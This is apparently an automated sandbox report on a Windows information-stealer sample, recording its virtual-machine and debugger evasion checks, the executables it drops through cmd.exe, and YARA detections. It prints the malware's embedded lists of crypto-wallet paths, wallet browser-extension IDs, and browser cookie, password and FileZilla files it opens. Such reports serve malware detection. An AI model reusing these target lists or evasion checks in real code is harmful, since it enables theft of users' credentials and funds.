Source: Amcache.hve.3.dr Binary or memory string: vmci.syshbin
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.3.dr Binary or memory string: VMware, Inc.
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.3.dr Binary or memory string: VMware20,1hbin@
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.3.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.3.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.3.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: VBoxService.exe
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.3.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: VMWare
Source: Amcache.hve.3.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.1818332466.00000000006EC000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Code function: 5_2_053E0B7A rdtsc 5_2_053E0B7A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C655FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C655FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65C410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C65C410
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001C643B mov eax, dword ptr fs:[00000030h] 12_2_001C643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_001CA1A2 mov eax, dword ptr fs:[00000030h] 12_2_001CA1A2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C62B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C62B1F7
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\KJJJJDHIDB.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe "C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe"
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe"
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62B341 cpuid 0_2_6C62B341
Source: C:\Users\user\Desktop\file.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Queries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformation
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5F35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp, 0_2_6C5F35A0
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 12_2_00196590 LookupAccountNameA, 12_2_00196590
Source: Amcache.hve.3.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: 5.2.JJEGIJEGDB.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.explorti.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.explorti.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorti.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.1835353412.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1883081687.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1923368430.0000000000191000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1915365040.0000000000191000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1883984397.0000000000A11000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.1875084748.0000000005230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.2284671985.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2879009091.0000000000191000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR
Source: file.exe, 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: MetaMask|djclckkglechooblngghdinmeemkbgci|1|0|0|MetaMask|ejbalbakoplchlghecdalmeeeajnimhm|1|0|0|MetaMask|nkbihfbeogaeaoehlefnkodbefgpgknn|1|0|0|TronLink|ibnejdfjmmkpcnlpebklmnkoeoihofec|1|0|0|Binance Wallet|fhbohimaelbohpjbbldcngcnapndodjp|1|0|0|Yoroi|ffnbelfdoeiohenkjibnmadjiehjhajb|1|0|0|Coinbase Wallet extension|hnfanknocfeofbddgcijnmhnfnkdnaad|1|0|1|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|1|0|0|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|1|0|0|iWallet|kncchdigobghenbbaddojjnnaogfppfj|1|0|0|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|1|0|0|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|1|0|0|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|1|0|0|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|1|0|0|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|1|0|0|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|1|0|0|Terra Station Wallet|aiifbnbfobpmeekipheeijimdpnlpgpp|1|0|0|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|1|0|0|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|1|0|0|Auro Wallet(Mina Protocol)|cnmamaachppnkjgnildpdmkaakejnhae|1|0|0|Polymesh Wallet|jojhfeoedkpkglbfimdfabpdfjaoolaf|1|0|0|ICONex|flpiciilemghbmfalicajoolhkkenfel|1|0|0|Coin98 Wallet|aeachknmefphepccionboohckonoeemg|1|0|0|EVER Wallet|cgeeodpfagjceefieflmdfphplkenlfk|1|0|0|KardiaChain Wallet|pdadjkfkgcafgbceimcpbkalnfnepbnk|1|0|0|Rabby|acmacodkjbdgmoleebolmdjonilkdbch|1|0|0|Phantom|bfnaelmomeimhlpmgjnjophhpkkoljpa|1|0|0|Brave Wallet|odbfpeeihdkbihmopkbjmoonfanlbfcl|1|0|0|Oxygen|fhilaheimglignddkjgofkcbgekhenbh|1|0|0|Pali Wallet|mgffkfbidihjpoaomajlbgchddlicgpn|1|0|0|BOLT X|aodkkagnadcbobfpggfnjeongemjbjca|1|0|0|XDEFI Wallet|hmeobnfnfcmdkdcmlblgagmfpfboieaf|1|0|0|Nami|lpfcbjknijpeeillifnkikgncikgfhdo|1|0|0|Maiar DeFi Wallet|dngmlblcodfobpdpecaadgfbcggfjfnm|1|0|0|Keeper Wallet|lpilbniiabackdjcionkobglmddfbcjo|1|0|0|Solflare Wallet|bhhhlbepdkbapadjdnnojkbgioiodbic|1|0|0|Cyano Wallet|dkdedlpgdmmkkfjabffeganieamfklkm|1|0|0|KHC|hcflpincpppdclinealmandijcmnkbgn|1|0|0|TezBox|mnfifefkajgofkcjkemidiaecocnkjeh|1|0|0|Temple|ookjlbkiijinhpmnjffcofjonbfbgaoc|1|0|0|Goby|jnkelfanjkeadonecabehalmbgpfodjm|1|0|0|Ronin Wallet|kjmoohlgokccodicjjfebfomlbljgfhk|1|0|0|Byone|nlgbhdfgdhgbiamfdfmbikcdghidoadd|1|0|0|OneKey|jnmbobjmhlngoefaiojfljckilhhlhcj|1|0|0|DAppPlay|lodccjjbdhfakaekdiahmedfbieldgik|1|0|0|SteemKeychain|jhgnbkkipaallpehbohjmkbjofjdmeid|1|0|0|Braavos Wallet|jnlgamecbpmbajjfhmmmlhejkemejdma|1|0|0|Enkrypt|kkpllkodjeloidieedojogacfhpaihoh|1|1|1|OKX Wallet|mcohilncbfahbmgdjkbpemcciiolgcge|1|0|0|Sender Wallet|epapihdplajcdnnkdeiahlgigofloibg|1|0|0|Hashpack|gjagmgiddbbciopjhllkdnddhcglnemk|1|0|0|Eternl|kmhcihpebfmpgmihbkipmjlmmioameka|1|0|0|Pontem Aptos Wallet|phkbamefinggmakgklpkljjmgibohnba|1|0|0|Petra Aptos Wallet|ejjladinnckdgjemekebdpeokbikhfci|1|0|0|Martian Aptos Wallet|efbglgofoippbgcjepnhiblaibcnclgk|1|0|0|Finnie|cjmkndjhnagcfbpiemnkdpomccnjblmj|1|0|0|Leap Terra Wallet|aijcbedoijmgnlmjeegjaglmepbmpkpi|1|0|0|Trezor Password Manager|imloifkgjagghnncjkhggdhalmcnfklk|1|0|0|Authenticator|bhghoamapcdpbohphigoooaddinpkbai|1|0|0|
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\passphrase.json
Source: file.exe, 00000000.00000002.1822925903.000000000135F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 81.77rs\user\AppData\Roaming\\Coinomi\Coinomi\wallets\\*.*n8
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
Source: Yara match File source: 00000000.00000002.1818332466.0000000000556000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1822925903.000000000137B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1822925903.0000000001324000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0.2.file.exe.4b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.1818332466.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 6436, type: MEMORYSTR